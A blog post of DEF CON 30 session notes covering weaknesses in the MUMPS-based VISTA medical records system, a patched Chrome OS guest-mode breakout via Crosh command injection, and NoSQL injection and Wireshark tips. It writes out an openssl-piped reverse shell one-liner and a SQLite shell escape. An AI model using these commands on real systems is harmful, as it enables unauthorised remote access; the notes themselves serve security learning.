DEF CON 30

author: Nathan Acks
date: 2022-08-13

DEF CON talks in the morning, and another workshop this afternoon.

How to Get MUMPS Thirty Years Later

SIDE NOTE: Zach uses a text-based slide generation tool called Moebius.

MUMPS is a versatile language (and development environment) originally developed for the VA. I predates *NIX and is incredibly versatile - it’s also used by other hospitals, police departments, banks, and even the ESA.

MUMPS has some interesting features: All keywords can be shortened to a single character. White space matters (except for newlines). Math is evaluated left-to-right (there’s no sense of order of operations O_o). Dates are comma-delineated strings that start in 1838 (and support up to the year 9999).

MUMPS can be treated as both a scripted and compiled language.

More than 50% of all electronic medical records pass through some sort of MUMPS application.

VISTA is a platform for handling electronic medical records that is written in MUMPS specifically for use by the Veterans’ Administration.

In hospitals, clients talk to VISTA using a network RPC. The most common client is CPRS (it’s written in a slightly more modern language, DELPHI O_o).

CPRS/VISTA are extremely chatty on the network.

VISTA uses a roll-your-own encryption scheme from the 1990s. Encryption can be trivially broken. Packets can be replayed. And there are hard-coded creds (though Zach doesn’t think that these are exploitable). So, be sure to layer TLS onto any MUMPS implementations!

Zach’s had trouble getting the VA to talk to them, so disclosure’s still ongoing here.

VISTA is really well-loved by the doctors who use it.

Chromebook Breakout

This is the Lost Rabbit Labs people. I saw them at a DC 303 meet-up.

This vulnerability was actually patched two years ago by Google…

This is a breakout from the Chrome OS guest user via the the Crosh shell using command injection in the set_* commands.

The Pico Ducky is a Rubber Ducky work-alike that runs on a Raspberry Pi Pico. It’s much faster than Hak5’s tool.

Interesting redirect trick - use 1>&2 to redirect STDOUT to STDERR (the reverse of what is normally done) to bypass some output filtering.

You can pipe sh through openssl for a reverse shell! Something like: mkfifo /tmp/irl; /bin/sh -i < /tmp/irl 2>&1 | openssl s_client -quiet -connect 127.0.0.1:1337 > tmp/irl; rm /tmp/irl

In older versions of Chrome OS, the Crosh shell could actually be launched in Dev Mode (without switching the entire box to Dev Mode) using crosh --dev (via set_apn command injection).

SQLite shell escape: .shell bash

Oof… There were (are?) hard-coded SSH public keys on Chrome OS; the corresponding private key was (is?) available in the Chromium code repo.

Chrome OS has a restricted finger command called pinky that’s used internally.

If you can get to dbus on a Chromebook, you can access some (but not all!) Dev Mode tools (like ping).

(I wasn’t able to catch the end of this presentation, however, as I needed to head out to my last workshop…)

Securing Web Apps

TIL: There is such a thing as NoSQLi, and it’s way easier than SQLi - just drop objects containing search operators into the NoSQL queries instead of actual data!

You can search within packets in Wireshark using the filter frame contains "$TEXT_TO_SEARCH".

If you can find an encryption key in a packet dump, you can try applying them to encrypted packets in Wireshark using “Preferences > RSA Keys”.

Wireshark can easily extract files from HTTP conversations. To extract them from raw TCP streams, (1) locate the beginning of the stream, (2) right-click on the packet and select “Follow > TCP Stream, (3) change “Show data as” to “Raw”, and (4) save it off using “Save As”.